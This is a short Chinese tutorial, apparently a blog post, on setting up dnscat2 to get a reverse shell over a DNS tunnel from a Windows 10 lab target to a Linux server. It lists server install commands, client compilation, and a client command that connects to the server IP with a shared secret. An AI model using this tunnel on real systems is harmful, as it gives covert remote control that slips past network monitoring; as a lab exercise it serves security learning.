使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
迷途知返-22 分钟前
服务器——那些年我踩过的坑
linux
China_Yanhy38 分钟前
我的区块链运维日记 · 第 11 日:生死时速 —— 闪电贷攻击与“红色按钮”
运维·区块链
枫眠QAQ1 小时前
hackthebox Cicada靶机
安全·web安全·网络安全
2401_840192271 小时前
怎么把运维能力沉淀下来?
运维
landonVM1 小时前
Linux 上搭建 Web 服务器
linux·服务器·前端
云游云记1 小时前
nesbot/carbon 常用功能总结
linux·运维·服务器
unable code1 小时前
磁盘取证-[第十章][10.1.2 磁盘取证方法]磁盘取证1
网络安全·ctf·misc·1024程序员节·内存取证
非凡ghost1 小时前
ShareX(免费截图录屏软件)
windows·学习·软件需求
啥都想学点1 小时前
kali 基础介绍(CredentialAccess——凭证访问)
安全·网络安全
慵懒的猫mi1 小时前
从XDG正式支持如意玲珑(Linyaps)看如意玲珑的发展与架构演进
linux·开源软件·deepin